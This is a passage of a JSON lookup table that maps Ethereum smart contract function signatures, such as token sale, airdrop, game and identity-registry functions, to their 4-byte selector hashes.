"fundingGoalReached()": "0xd424f628", "oracle_price_decimals_factor()": "0x70bdd155", "capCommitment()": "0x19fce740", "pricePointsLength()": "0x342ca5d6", "FourthAddressBalance()": "0x5471dd4c", "MAX_TOKEN()": "0x6e1bd323", "moveUnsold()": "0xd14f56f1", "lockCostPerHour()": "0xc2410a69", "DICIMALS()": "0x25cbeb0a", "fluffyCatAddress()": "0x73cb0620", "DEV_DECIMALS()": "0x2f7cdb0e", "advisorAccount()": "0x200f29e3", "PLATFORM_FUNDING_SUPPLY()": "0x3a3b0382", "airdropEnd()": "0x0fe3152e", "TOKEN_MINTING()": "0x947e8a26", "preSaleCap()": "0x446303f3", "rateHard()": "0xc6e04590", "check_deadline()": "0xe6bf6ca2", "totalEarlyStage()": "0xd93112e3", "walletFounder3()": "0x6ad80326", "GoldAmountMelted()": "0x63c7d473", "tokenaddress()": "0x3feff76d", "TIER1_CAP()": "0x964ad434", "dividendContract()": "0x6124e4e7", "polyCustomersAddress()": "0x0ab763d0", "incentiveDistributionRound()": "0x61b79ea4", "round4()": "0x5820c9ae", "addAffiliate()": "0x1a39e1cf", "limitEth()": "0xc6eae0c5", "IAM_PER_ETH_PRE_SALE_RATE()": "0xe2e68372", "configTimeMax()": "0x16f0e221", "TOKENS_ALLOCATED_TO_SERVUS()": "0x9388b560", "accumulate_to()": "0x10e80ded", "cmoAddress()": "0x8c267b97", "pauseRoundB()": "0x82067cc0", "rateOracle()": "0x98f4b1b2", "voteToHarvestFund()": "0x21d3523c", "shareholder3()": "0xa4620d67", "ALLOC_MARKETING()": "0x764300bf", "HardCap()": "0x5040c6e7", "arbitrationFeePerJuror()": "0xa10e6d28", "voteEndTime()": "0x9e6cb42b", "numOfBoundaries()": "0xd4f114a6", "DistributionNextPos()": "0xe385b43a", "minSelfBuyPrice()": "0x7df432c9", "assignedAmountToCooperativePartner()": "0xdb7d9065", "OwnerCashout()": "0x3ed4006b", "ENDDATE()": "0x1db9ec2c", "m_frozen()": "0x162255e1", "investors()": "0x8ac27f5f", "hardCapCrowdSale()": "0xdc760edf", "nextMaxPlay()": "0xea177073", "ownerValidator()": "0xd2d5a55c", "erc20Proxy()": "0x7f555b03", "getHKGPrice()": "0x277ccde2", "servusMultiSig()": "0x2aff2843", "MAX_BUYIN_GAS_PRICE()": "0xe963f3e8", "lockPercentage()": "0x356442b9", "draftNewCard()": "0x923ce65f", "maxPerWallet()": "0x453c2310", "PRE_SALE_2WEEK_BONUS()": "0xb81ec822", "debug3()": "0x610da891", "currentEventId()": "0x091dbbd7", "endCrowdsalel()": "0xbde1f585", "lckTokenAddress()": "0xc89b989e", "newIdShipProduct()": "0x3c876c6f", "rateICO()": "0xc8765ff2", "devTokenTimelock()": "0xe9d9c4a9", "ETHER_AMOUNT()": "0x3dd7609a", "FoundersFund()": "0x9be8a212", "proof_of_public_key1()": "0x178c4e40", "preBuy3()": "0x0fdfa5ee", "lastCallPUST()": "0x84dd4332", "Stage2Allocation()": "0x5626e246", "lastBlock_v13()": "0x49404d25", "SMTfundAfterPreICO()": "0xca41d16f", "divider()": "0x378efa37", "lotteryGiveHunt()": "0xb6397a42", "depositPercents()": "0x3b7cbfcf", "tier2Count()": "0x92403b35", "MAIN_SALE_BONUS_PERCENTAGE_PHASE4()": "0xc90a6a8e", "prolong()": "0x0194abaf", "hardLimitICO()": "0x9625a6c6", "getInvestorCredit()": "0x5f7b73b2", "owner2()": "0x52709725", "publicSellLockEndTime()": "0x77a43129", "disputeID()": "0xb0a1e2b4", "tokensTransferredToHold()": "0x76f187ab", "block4()": "0x0fa2d864", "manualBonusActive()": "0x2596c93b", "total_points()": "0x25d5eafa", "initialSupplyPrivateSale()": "0xbaf9c5a2", "wethContract()": "0x4780eac1", "list()": "0x0f560cd7", "magicnumsig()": "0x25233782", "crowdfundFinalized()": "0x84086357", "fifishICO()": "0x3f5228c7", "purchaseETH()": "0x3062cd8a", "USD_GOAL()": "0x4f0e3dad", "token_sale_end_block()": "0x59193981", "privatePlacementAllocatingToken()": "0xbeba285d", "jackpotTime()": "0x20d00018", "blackFundsWallet()": "0xeb78a26d", "prolongedDuration()": "0x19a9119f", "minimumBidAllowed()": "0x08ed8e0c", "totalMigratedIn()": "0x7a8a5cf3", "richToken()": "0x7a8566ae", "SALES_SUPPLY()": "0x5eaaa699", "totalSold_()": "0xe3098986", "finalLottery()": "0x92ff4be4", "dividendCount()": "0x7cb25bc7", "firstBonusLimitPercent()": "0x70e32ae7", "DatToDtrcDenominator()": "0x6d3e4502", "conflictEndFine()": "0xfcec617a", "Bonus()": "0xef8fdfd8", "loserOne()": "0x252f34a7", "monsterHealth()": "0x49e123c8", "sellRate()": "0x6217229b", "getServiceProvider()": "0x571959e0", "checkMyVestingPeriod()": "0xd3d8acf8", "maxImports()": "0x624ba0a4", "balanceOfSPS()": "0xfd14ecfe", "CANVAS_HEIGHT()": "0xed4127df", "traded_token()": "0x8d5cc102", "endTimeAddBonus()": "0x8dfa6fcb", "dev2()": "0x8013f3a7", "privateExchangeRate()": "0x1eb5de94", "notInWhitelistAllow()": "0x7f5a285a", "gatFoundDeposit()": "0xb6712a4f", "blt()": "0xcfc4af05", "stage5Deadline()": "0x651680af", "earlyPurchaseTokenAmount()": "0x6bef2a94", "ethReceiveMainSale()": "0x13f233c2", "isEnableBuySell()": "0xe2f23224", "ZRX_TOKEN_CONTRACT()": "0x3b30ba59", "teamToken2019()": "0x6e441752", "hon1ninja()": "0x49fa84ef", "eidooWallet_()": "0xbd09f117", "Miners()": "0x097f1192", "verifyParams()": "0x2592e921", "timeLockedBeneficiariesDisbursedTo()": "0x5a4877c0", "totalFundsWithdrawn()": "0x6a29150e", "isPreICOPublicClosed()": "0x81d45a5c", "setOperateMode()": "0xc8857dcd", "totalIssued()": "0xf5be3193", "preallocated()": "0x2925827c", "round4Cap()": "0x464cccc8", "petHpThreshold()": "0x077cd4bf", "highestBidPrice()": "0x45cb3f4d", "SALE_address()": "0xe3a83290", "entryFee_()": "0x2290d6e2", "yesHash()": "0x2ecb9279", "COPPER_AMOUNT_XPER()": "0x8e964de9", "minimumTimeBeforeUpdate()": "0x5148de8d", "getCommitteesNumber()": "0x27734225", "frozenSupply()": "0xc7be7ae3", "priceClaim()": "0x672781ed", "contract_eth_value_bonus()": "0xa8644cd5", "investors_needed_until_jackpot()": "0x806a2a3c", "totalPhase2Donations()": "0xe6c25aa1", "presaleDist()": "0x40e15134", "QuickPrice()": "0xdc201838", "getUserSize()": "0xc040ebec", "m_bIsLock()": "0xfb3fd6a1", "HShoe_Limit()": "0x7e71ccd8", "abioToken()": "0x881adeaa", "WALLET_FOUNDER()": "0x751d9e65", "minBidMultiplier()": "0x0f9e39bf", "Information()": "0x26e770e9", "PRESALE_ETHER_MIN_CONTRIB()": "0x5f61a26e", "teamAccountAddress()": "0xe2f35f17", "minContributionWei()": "0x91294ed1", "komission()": "0xd66b0b51", "numberOfDates()": "0x3328d3f0", "endTimeSale3()": "0x0bc5e51e", "tokenSaleContractAddress()": "0x86b467f2", "token_ratio1()": "0x14225b9b", "markettingPercentage()": "0xba2fa957", "medium()": "0x97ccd07b", "winTokenReward()": "0x9216b7ad", "checkRoundsNumberToRun()": "0xe9a241cc", "minimumPurchaseInWei()": "0xb760e822", "myWeapons()": "0xd337b9c9", "URL()": "0x3c1ab2a3", "recordAddress()": "0x713ec905", "teamTwoId()": "0xaa99f4d0", "timeMode()": "0x057b17c0", "getEarningAmount()": "0x59187cec", "bountyTokensNotDistributed()": "0x9e69a6d2", "TRANSFER_COST()": "0xe35b37fe", "blink()": "0xea773d9e", "Whales()": "0x0b077fe7", "ARMYToken()": "0x0d0d0554", "Ethernite()": "0x2ae7c2df", "Gidnist(address)": "0xf4c679db", "getFairymasterReq()": "0xe358d75a", "getMyFairy()": "0x08a91751", "getFreeFairy()": "0x597d6640", "becomeFairymaster()": "0xbfd3fa6a", "FairyFarmer()": "0xe153591c", "lengthOfCommonPrefix(bytes32,bytes32)": "0x2614fff6", "getStore(string)": "0xffc31215", "setAStore(string,address)": "0x543a9ce4", "setManagerAndClaimer(address,address)": "0x8df35abe", "setClaimer(address)": "0xcdfb5832", "getLog(uint256)": "0x3206b2c6", "getLogSize()": "0x0c73a392", "getBalanceSize()": "0x538f5997", "getBalanceAddr(uint256)": "0xdf0f26f9", "CoinLordToken(address)": "0x580822da", "change_rate(uint256)": "0xaa54e040", "change_b(address)": "0xfca2452b", "change_a(address)": "0x4bfc4782", "Foo(string)": "0x9f0b7f16", "getPlacedNotes()": "0x8bc19c04", "getNoteOwner(uint256,uint256)": "0x38ededc9", "getNote(uint256,uint256)": "0xdb491e80", "getNoteLine(uint256)": "0x02ccee02", "removeOwnedNote(address,uint256,uint256)": "0x23ef604f", "removeNotes(uint256[],uint256[],uint256)": "0x99d0f06c", "placeNotes(uint256[],uint256[],uint256)": "0x874a7036", "CompositionPart(uint256,address)": "0x1fff7a97", "AC(uint256,string,string,address)": "0xd5ce6719", "dropVotes(address[])": "0x8912ab5c", "closeSale(address,uint256)": "0xb5439012", "isCloseSale()": "0xa8670711", "Rubid()": "0x446298e2", "CryptonHotels()": "0x13bc33ca", "GandhiJi()": "0x58d63255", "WBU()": "0x8781382e", "WETCToken()": "0xfab3be9a", "LudumToken()": "0x8d6731b0", "LifeChain(uint256,string,string)": "0x504fbb19", "LAFINAL7()": "0x29519c9c", "getSubjectMattersSize()": "0xe085942a", "updateSubjectMatter(uint256,string)": "0xf4f3b97c", "addSubjectMatter(string)": "0xdb8b6ccf", "PharmaGenome()": "0xc46aaf38", "jvCoin()": "0x37254184", "PDPCointoken()": "0xf9b290b6", "Voyager()": "0xf45811bd", "setraisedAmount(uint256)": "0xf55b8fc9", "PhxHell(address)": "0x347caeb4", "CryptoWCRC(uint256,uint256,bool,address,address)": "0x5392279d", "getTokenNextPrice(uint256)": "0xf78cc9cf", "purchaseWithToken(uint256)": "0x3931c9a8", "purchaseWithEth(uint256)": "0xb6629e20", "WorldCupAuction(uint256,uint256,bool,address,address)": "0xa5a5f468", "auctionUnpause()": "0x02bf3165", "auctionPause()": "0xf0d7f3eb", "getTokenPriceListByIds(uint256[])": "0x3688c272", "getTokenByOwner(address)": "0x2bf79c94", "WorldCupControl()": "0x0aeb4b26", "_createToken(string)": "0xca6cfd95", "WorldCupFactory(uint256)": "0x684f19c9", "wcf(address,uint256)": "0x56131736", "removeInvestor(address)": "0x42714978", "transferCurationRights(address)": "0x0e8ca718", "Curatable()": "0x98f20367", "HaltableToken(address)": "0x78e5d841", "PrivateSale(address,uint256,uint256,uint256,uint256)": "0x2e18cead", "newRC(uint256,uint256)": "0x776676d6", "RC(address,uint256,uint256,uint256,uint256)": "0xc9d12d11", "DFSCrowdsale(uint256,uint256,uint256)": "0x121af083", "T8CToken(address,uint256)": "0x2aa2b7eb", "StarCoinPreSale(uint256,uint256,address,address,address,uint256,uint256,uint256)": "0x3c49ff0c", "HarjFarmer()": "0x2f1d29fd", "WandtChaintest(uint256,string,uint8,string)": "0x28de78d0", "getRelationWith(address)": "0x661b9065", "updateProfile(bytes32,bytes32)": "0xf24113c6", "unblockMessagesFrom(address)": "0xa8e70dd3", "blockMessagesFrom(address)": "0x0a5dc5a9", "sendMessage(address,bytes,bytes32)": "0x2c4ac770", "join(bytes32,bytes32)": "0x5b419a65", "acceptContactRequest(address)": "0x6fbd6f6b", "addContact(address)": "0xa414b379", "SPORT(uint256,string,uint8,string)": "0x7e7d76ad", "LocusOne()": "0x9dbdfe0d", "revokeAttributeSigned(address,uint8,bytes32,bytes32,string,bytes)": "0xd25a1212", "revokeAttribute(address,string,bytes)": "0x7feda59a", "revokeAttribute(address,address,string,bytes)": "0x40f10af2", "setAttributeSigned(address,uint8,bytes32,bytes32,string,bytes,uint256)": "0xf3f2e656", "setAttribute(address,string,bytes,uint256)": "0x05733989", "setAttribute(address,address,string,bytes,uint256)": "0x9094b22f", "revokeDelegateSigned(address,uint8,bytes32,bytes32,string,address)": "0xa641d28e", "revokeDelegate(address,string,address)": "0x7ab528c9", "revokeDelegate(address,address,string,address)": "0x281a0ff7", "addDelegateSigned(address,uint8,bytes32,bytes32,string,address,uint256)": "0x6a833a6c", "addDelegate(address,string,address,uint256)": "0x9a94ab9c", "addDelegate(address,address,string,address,uint256)": "0xd8063ea6", "validDelegateSignature(address,string,uint8,bytes32,bytes32,bytes32)": "0x3c71b7b6", "Nine()": "0x002a4b14", "OrpheusOrganicsThailand()": "0x07d544fa", "SuretlyToken()": "0x27275a35", "lolaToken()": "0x2100bf7a", "TokenBank()": "0x60cb8884", "instantTrade(address,uint256,address,uint256,uint256,uint256,address,uint8,bytes32,bytes32,uint256,address)": "0x08e05b85", "migrateFunds(address[])": "0xbe3dd131", "tradeBalances(address,uint256,address,uint256,address,address,uint256)": "0xf6e4a3dd", "getAccountModifiers()": "0x59015ed5", "changeAccountModifiers(address)": "0x38ec18c3", "deprecate(bool,address)": "0xe6213127", "TokenStore(uint256,address)": "0xf5bb5aac", "tradeComplete(address,uint256,address,uint256,address,address,uint256,uint256)": "0xf0fc1438", "tradeModifiers(address,address)": "0xe97fe114", "accountModifiers(address)": "0xea08ec2c", "SunToken(uint256,string,uint8,string)": "0xb42d6bd2", "Civiq()": "0xe7ea4406", "MeowCoin()": "0xfd82902d", "Kitcoins()": "0xb2bc2f68", "PriceCalculator(uint256)": "0xf63c2659", "CMK()": "0xa1826a9a", "freeTransfer()": "0x211ed6c1", "finishTransferFeePayment()": "0x695a4cad", "setInformation(string,string)": "0x5546a12c", "setMintingFeeEnabled(bool)": "0x34fb11ed", "finishBurning()": "0xd8bf0ef8", "TKCC(uint256,string,string)": "0x708b2097", "addPhase(uint256,uint256,uint256,uint256)": "0xfe669c26", "getPriceUSDcETH()": "0xee783c14", "DeneumToken()": "0x6c5f8394", "disableIssuance()": "0xf76bd7d1", "XBPToken()": "0x1268cb71", "changeApprovalCore(address,uint256,uint256)": "0xdd864883", "TokenRetriever()": "0x2dcca1f9", "requireValidIndex(uint256,uint256)": "0xe0e6d6cb", "catchYou(address,uint256,uint256)": "0xa6cb4654", "jailAmountOf(address)": "0x8745ddb3", "PortalToken()": "0x6ff5a670", "ExToke()": "0x34988b95", "setPreIco(address)": "0x9a526b97", "removeReferral(address)": "0x4f4fa5a6", "addReferral(address)": "0xe8aca46a", "_updateStage()": "0x4e0b7888", "_getTokenAmount(uint256,bool,address,address)": "0x3124167b", "getRefReservedTokens()": "0xebd8d7a0", "getReservedTokens()": "0xa16f3774", "_reserveRefTokens(address,uint256)": "0x89cf9f94", "_reserveTokens(address,uint256)": "0x75fa1bd3", "_processReserve(address,uint256,address)": "0xaadf017e", "_processPurchase(address,uint256,address)": "0x989e4a8c", "_preValidateReserve(address,uint256,address)": "0x1889fc0a", "reserveTokens(address)": "0x835bbd55", "MerkleAirDropToken(string,string,uint8,bytes32,uint256)": "0xafc8fbc6", "endVoting()": "0xc3403ddf", "voteOf(address)": "0xf3b35100", "addVoting(uint256)": "0x9cdbc070", "SBIBank(address)": "0xed6d4055", "FMWL()": "0x3f7ca612", "VTOSToken(uint256,string,string)": "0xff5e51b3", "EVT()": "0x11bec062", "doPurchaseFor(address)": "0xdeda20de", "finishPhase()": "0x811aecf4", "startPhase(uint256,uint256,uint256)": "0x1f8c07b0", "DesTokenSale(address,address)": "0x6b52a86f", "XLedger()": "0x60368f30", "DXBCToken(address)": "0xa1b4dd2d", "doAirDrop(address[])": "0xd032ae76", "TklnAirdropToken()": "0xa29b7fa0", "createSaleAuction(uint256,uint256)": "0x19d70e0b", "computeBlockPrice(uint256,uint256,uint256)": "0x59e23ccf", "create(string,uint256,uint256,uint256)": "0x2a970043", "migrateBlock(string,uint256,uint256,uint256,address)": "0x11a5b9bc", "buyBlock(string,uint256,uint256,uint256,uint256)": "0xa5bdbb28", "bidCustomAuction(uint256,uint256,address)": "0x9eeef510", "SaleAuction(address)": "0x4a8075ac", "_createBlock(uint256,uint256,uint256,string,address)": "0xbcba53f4", "transferBlock(address,address,uint256)": "0x6f200ce3", "VRFtoken()": "0x4b8dbd1a", "changeValues1(bool,bool,bool,bool,bool,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x346ffa4b", "CGE()": "0x02dbf3c8", "InitiatePlanets()": "0x5eb19eda", "createPlanet(string,uint256)": "0x2289115b", "getPlanet(uint256)": "0x34efcb8e", "getUserDetails(address)": "0xcc3d967b", "StealResources(uint256)": "0x4a7510fc", "purchaseDefense()": "0xcb1c8b6a", "purchaseAttack()": "0x3be94219", "purchasePlanet(uint256)": "0xb7a40f21", "LOCToken()": "0x3e91a622", "getMsgWaiting(uint256)": "0xac5cfc3d", "createNewMsgAwaitingAudit(string,uint256)": "0x3aca9ffd", "addAudit(uint256,bool)": "0x1ef410e2", "msgQPut(string)": "0x3542d0f6", "addAnn(string)": "0xac098ce9", "Announcement(address[],uint256,uint256)": "0x8c55041c", "lockTeamAndReserve()": "0x342442bd", "lockSeedInvestors()": "0xbd47dd7a", "Option(uint256,uint256,string,string,string,string,string,string,bytes32,address,string,address,uint256)": "0x33fcffa8", "YesNo(string,string,string,string,string,string,bytes32,address,string,address,uint256)": "0x83a1a4f2", "ReserveToken(string,string)": "0x64d3e7c9", "changeMinAccEthers(uint256)": "0xa2597659", "flushEthers()": "0x1074c619", "setInitialTime()": "0xf90b2e74", "setAutoPrice()": "0xfde4d9bf", "setManualPrice(uint256)": "0xd7a71868", "changeToStage(uint8)": "0x5709013e", "makeSwapInternal()": "0x80bf98f8", "IcoExt()": "0xe26dee0e", "PoSatoshi()": "0x17e04e55", "OrpheusBlockChainCitySiam()": "0xc40d62fe", "AMToken()": "0xc9f68025", "OMC(uint256,string,string)": "0x264534be", "ROPE()": "0x030b1776", "bringBackTokens()": "0x0263379b", "updateTokensAvailable()": "0xfd6133a6", "TESTER()": "0x224a8174", "addCard(uint256,uint256)": "0xea4a294f", "toDecimals(uint256)": "0xeb2b381a", "getCommitmentsOf(address)": "0x732264b4", "getAllRewards()": "0x45b35f56", "commitOn(uint256)": "0xcc9415d0", "currentWindow()": "0xba0bafb4", "detailsOfWindow()": "0x83ccdcc3", "detailsOf(uint256)": "0xc0f8275e", "windowOf(uint256)": "0xf5965d55", "allocationFor(uint256)": "0x79492f30", "blockReward()": "0x0ac168a1", "getCommitment(address)": "0xfa1026dd", "commitmentOf(address)": "0xf662b881", "signedAverage(int256,int256)": "0xc46a23a2", "getReward(address)": "0xc00007b0", "lockTokens(address[],uint256[])": "0x3547800a", "ValidToken()": "0x592a5f9b", "getMyTurtles()": "0xed0668fb", "getFreeTurtles()": "0x8df8c008", "markCrowdsaleEnding()": "0xc9a82aa8", "Fosha(address)": "0x827d7ba9", "subtrReferralDeposit(address,uint256)": "0x69c8c7ef", "DAOToken()": "0xd585b852", "removeFromBlackList(address,address)": "0xb0934d7d", "addToBlackList(address,address)": "0x21479265", "OwnableWithDAO()": "0xe98d3112", "VietnamGemstoneChain()": "0x9e13d3e1", "RealEstateCouponToken()": "0x9d2620bf", "LAFIN()": "0xf1931b9e", "set_status_user(address,address,bool)": "0x3540233b", "_transfer(uint256)": "0xda34b7f3", "set_prices(uint256,uint256,uint256)": "0x5f1fc571", "SafeBoxCoin()": "0x6ce0a6a4", "checkLength(string)": "0x30f1fe82", "updatePassword(uint256,string,string,string)": "0xd2051f8e", "getBookLength()": "0xffee7c97", "addPassword(string,string,string)": "0x6c5376c9", "Pass()": "0x60595433", "EIDTokenERC20()": "0xc7f6fa60", "DPC(uint256,string,string)": "0x8b959014", "SaveCoin()": "0xbd7be110", "RidgeToken()": "0x5817465c", "Cremit()": "0x7144e81e", "DMChainToken(string,string,uint8,uint256)": "0x68f15aac", "payService(address,uint256,uint32,string,uint64,uint64,uint64,uint64,uint64,uint64)": "0x30a95aa7", "catchMonster(address,uint256,uint32,string)": "0x82d559de", "createCastle(address,uint256,string,uint64,uint64,uint64,uint64,uint64,uint64)": "0x5abcc417", "giveBattleBonus(address,uint256)": "0x5fee0aac", "setConfig(uint256,uint256,uint256,uint256,uint256)": "0x3f720922", "setContract(address,address,address,address,address)": "0x20eb2a87", "getRandom(uint8,uint8,address)": "0x3a34f09a", "EtheremonPayment(address,address,address,address,address)": "0xd3daa8aa", "buyEggWithToken(address)": "0x5b86ce97", "removeHatchingTimeWithToken(address)": "0xa3cb3e97", "createCastleWithToken(address,uint32,string,uint64,uint64,uint64,uint64,uint64,uint64)": "0xb04e7668", "NHC()": "0x30d323ae", "XCDT()": "0xd014d667", "multisend(address,bytes32,address[],uint256[])": "0x206ec7a1", "paymentSuccessful(bytes32)": "0x066b3136", "freezeDeliverMultiStandalone(address[],uint256[],uint256[],uint256,uint256)": "0x679019ba", "freezeDeliverMuti(address[],uint256,uint256,uint256,uint256)": "0x2111c0f9", "freezeDeliver(address,uint256,uint256,uint256,uint256)": "0x34d05b1f", "airDeliverStandalone(address[],uint256[])": "0xb885d560", "airDeliverMulti(address[],uint256)": "0x0c3e564a", "airDeliver(address,uint256)": "0x0ea7c8cd", "beginSell()": "0x55d8bbd5", "pauseSell()": "0x9754a7d8", "setPublicOfferingDate(uint256,uint256,uint256)": "0xe73140c1", "setPublicOfferingLimit(uint256,uint256)": "0x984809bf", "setPbulicOfferingPrice(uint256,uint256)": "0x59287ce9", "FNKOSToken()": "0x6d6fa6b1", "QUASI()": "0x47d98eb4", "SLChainToken(uint256,string,uint8,string)": "0x9b818ace", "Swapcoinz()": "0x9280df59", "AceEquityToken(uint256,string,string,uint8)": "0xdfeade00", "BEERCOIN()": "0xdde8dab2", "QZG001TOKEN()": "0x14204ca9", "Nurucoin()": "0xe91df414", "ECOS(address)": "0xb98c90c2", "HydroToken()": "0x02e33d25", "SecretToken()": "0xe2b20a72", "HHGTTG()": "0x02f9fd84", "CBT()": "0xa81dfde0", "LicenseCoin()": "0xb72f0e06", "tokenDecimalPlaces()": "0x1792cc61", "MinimumDonation()": "0x3f5c6a50", "systemAcc()": "0x3b2269cf", "getDiscountStage()": "0x16a69a9a", "objectShield()": "0xf437d6bc", "promoToonsMinted()": "0xf42541be", "airDropTime()": "0xcfefeb60", "businessPlannedPeriodEndTimestamp()": "0x62b40489", "iouTokens()": "0x9a3fc66d", "currentInvestment()": "0xb2667cd0", "VoteCountPerProcess()": "0xa15a8613", "crowdsaleStarts()": "0x4e2fa68f", "amountAlreadyPaidBack()": "0xe684aa5c", "currentRecord()": "0x07b3776c", "gxc()": "0x1e567582", "PRESALES()": "0x06921a9c", "Rate8()": "0xb9902eef", "mOwner()": "0xdcda4bf3", "indSale()": "0x76ea909d", "saleEndTokenCreationRate()": "0x03f979c8", "END_ICO_TIMESTAMP()": "0x687db864", "minStakingAmount()": "0x25c065b1", "activateUniqueSpinners()": "0xaada1cb3", "PRESALE_RATE()": "0x340695c0", "startICOPhaseOne()": "0x762ac19d", "getUSD()": "0x5c88da6f", "closeHouse()": "0x587fa8dc", "weiForToken()": "0x361228ea", "funderSmartToken()": "0x0d39968c", "maxPresaleSupply()": "0x21bdb26e", "strikersMetadata()": "0xc8a2cc03", "variationProbably()": "0xb494b49d", "carTransferState()": "0x8e26c30c", "c_centsPerTokenSecond()": "0x1c54220d", "lockTokens()": "0x0a56293d", "icoOver4()": "0x04b370ab", "reserveAmount()": "0x4b09b72a", "lastWillAccount()": "0x0aa2bbaa", "minPurchaseAmount()": "0xb47dbf22", "devMiningRewardPerETHBlock()": "0xd03cff97", "escrowAdmin()": "0x8761fb7c", "betPrice()": "0xcfd8a175", "AdmineTeamTokens()": "0xf089d566", "rate_toTarget()": "0x97495cce", "operationalReserveAddress()": "0x972e6151", "getProjectUsedTokens()": "0x5957ee49", "RANGESTART_4()": "0x53acae4a", "canConvertTokens()": "0x453cbb11", "advisorsPool()": "0xa42b0d88", "totalScaleStaked()": "0xf162c5a1", "oslikiFoundation()": "0xc8d88829", "MAX_STAGE_1_LIMIT()": "0x7a0b0a3f", "unpause_4()": "0x13424bf0", "SingularDTVWorkshop()": "0xc53adaff", "major_partner_address()": "0xe4171746", "ProjectName()": "0xd5f9e6c7", "totalContractHolders()": "0xcd1f9a57", "SIGMA_MAX_CARGO()": "0xccb50a29", "minPayInterval()": "0xce4a9206", "AMOUNTWAGERED()": "0x13d73a08", "tokensIssuedLocked()": "0x7c38ce18", "FOUNDERS_POOL_ADDR()": "0x46602ce7", "belowSevenBets()": "0xc1afdd48", "KPOP_ARENA_CONTRACT_ADDRESS()": "0xfa4de094", "COLOR_BLACK()": "0xf2f6ff15", "TOKEN_SUPPLY_OWNER()": "0xbb74b4e6", "transferAidrop()": "0x54d7c34d", "round1()": "0x836e8180", "MilestonesEntity()": "0x30f75890", "publicsalestartTime()": "0x7159271d", "latestErc20TxRequest()": "0x25327b75", "ACTION_SELL_OFFER_ACCEPTED()": "0xd5a53dec", "teama()": "0x9f2ff221", "latestDifficultyPeriodStarted()": "0xcb9ae707", "TOKEN_DECIMALS_MULTIPLIER()": "0xec6c18fc", "ChargeFee()": "0xa283063c", "stakingMintRate()": "0x628a01ce", "START_WEEK_1()": "0xecff39af", "MAX_PAYOUT_FRAC_TOP()": "0xbcc9ed6f", "stepProfit()": "0xa7b314ac", "cooAddress3()": "0x636bd9dc", "totalModerators()": "0x4efb023e", "targetBondingRate()": "0x821b771f", "FeeAddr2()": "0xb156f79b", "pendingRewardsToMint()": "0x56f2eb90", "confirmationPeriodOver()": "0xf1d61850", "jypcBonus()": "0x387eaedb", "THIRD_TIER_DISCOUNT()": "0x53f95cc6", "oneday()": "0x41434351", "OPERATIONS_ADDRESS()": "0x6f0f45d2", "getTotalWins()": "0xce146d3d", "USD_CAP()": "0x487a9e27", "baseTokenCapPerAddress()": "0x492b3bf7", "isTermOver()": "0x06562575", "restrictions()": "0xa077b298", "level2Bonus()": "0xdaee9e35", "refillTxFeeMinimum()": "0xe45ce7e3", "unlockMintDate2()": "0x5446b604", "secondYearEnd()": "0x0bf5035d", "tokensaleWallet()": "0x31bf0667", "withdraw(uint256,string)": "0xdc048cf2", "DigitalEnthusiasts()": "0x739838be", "BitGemPlayToken(address,address)": "0xf0044924", "minimumWithdrawal()": "0x738b31b5", "checkMinGoal()": "0x8e59a15b", "CryptoTestCoin()": "0x8ace4131", "setIntervalSchedulePresale(uint256,uint256,uint256)": "0xf09304b5", "presaleDeadline()": "0xed185562", "setAssetProxy(address)": "0xc0b3569d", "setVesting(address)": "0x6f6ff3bc", "vesting()": "0x44c63eec", "paymentInterval()": "0x1cc1cf46", "assetProxy()": "0x0b1350cf", "isSignedWithEnc(uint16)": "0x04b47e21", "isSignedNoEnc(uint16)": "0x1cecb935", "unsafeIsEncrypted()": "0xe0f609d4", "unsafeIsSigned(uint16)": "0x4ac39f37", "unsafeIsEth(uint16)": "0xb5881422", "setOwnerAsAdmin()": "0x480744e0", "listAllAdmins()": "0xc12c31d6", "setAllowErc20OwnerClaim(bool)": "0x16735925", "ercOwnerClaim()": "0x1aedf542", "deployCommunityBallot(bytes32,bytes32,uint128)": "0x7c54aa1a", "getCommunityBallotsEnabled()": "0xe13245b1", "setCommunityBallotStatus(bool)": "0xf321653a", "fwdPaymentAndData(address,bytes)": "0xba3019de", "fwdPayment(address)": "0x1892c15a", "fwdData(address,bytes)": "0xfb21eefd", "checkFwdAddressUpgrade()": "0x3a257fdc", "proxyVersion()": "0x5e068da5", "isProxyContract()": "0xd2846c7b", "b13ToBytes(bytes13)": "0xd3bbb2c8", "mkDomain(bytes32,address)": "0x5ebb7077", "_checkEvenIfCommBallot(bytes32)": "0xed7546b7", "_deployBallotChecks(bytes32,uint64)": "0x5757a66a", "dAdd(bytes32,address)": "0xaffb62dd", "_addDemoc(bytes32,address)": "0x83f57fd7", "spawn(bytes32,address,address)": "0xe87bbdbb", "setCommunityBallotCentsPrice(uint256)": "0x6c5649d8", "SAFCOIN(uint256,string,uint8,string)": "0xc07b2586", "RKGToken()": "0xc335f0a4", "subBalances(address[],uint256[])": "0x46e36060", "getall()": "0x90974795", "setactive(bool)": "0xf43a72b0", "setPrices(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xa269e31f", "addmoney(address,uint256,uint256)": "0x4d918282", "withdrawDevelopersCut()": "0x6853367f", "getPlayer()": "0x3308f42d", "getCells()": "0x374aed97", "distributeToReferreal(uint256,address)": "0xf20d5e57", "getRankOnePlayer(address)": "0x26f8abf9", "earningsOfPlayer()": "0xc4b379f7", "distributeEarningsBasedOnScore(address,address)": "0xfd7560ca", "earningsFromScore(address,address)": "0xa224f4ce", "distributeEarningsBasedOnNumberOfCells(address,address)": "0x617d6bb4", "earningsFromNumberOfCells(address,address)": "0xeeda0e21", "sqrt(int256)": "0x665df460", "funder(address)": "0x12cd24be", "calcTokens(uint256,uint256,uint256)": "0x9f5ff50a", "initStages()": "0x675f9ad9", "Stage1MEI()": "0x19bad1b2", "Ticker()": "0x4b41c74a", "ExchangeRate(uint256)": "0x8d256b0a", "GetContributorData(address,uint256)": "0x2ab0bf3c", "EndStage()": "0x0f5eacf6", "FinalizeStage()": "0x8111ecef", "addFunds(uint256,address)": "0x2bf37c42", "BitCoin()": "0x2ac306b0", "AEFFTOKEN()": "0xfb49dc4a", "transferDomainOwnership(bytes32,address)": "0x1dc9a3b9", "newSubdomain(string,string,address,address)": "0xcd4b3c57", "RozelCoin(uint256,string,string)": "0x66c7d1ed", "SetTime(uint256)": "0xf4d0b67f", "ETHERGOLD()": "0x9a565169", "currentCap()": "0x856ed703", "setCapRec(uint256[],uint256[],uint256)": "0x5b0783f3", "initCaps()": "0xb52a3d8d", "_getVersion()": "0x140a681a", "PensionCoin()": "0x7d83e527", "AldiyoCoin()": 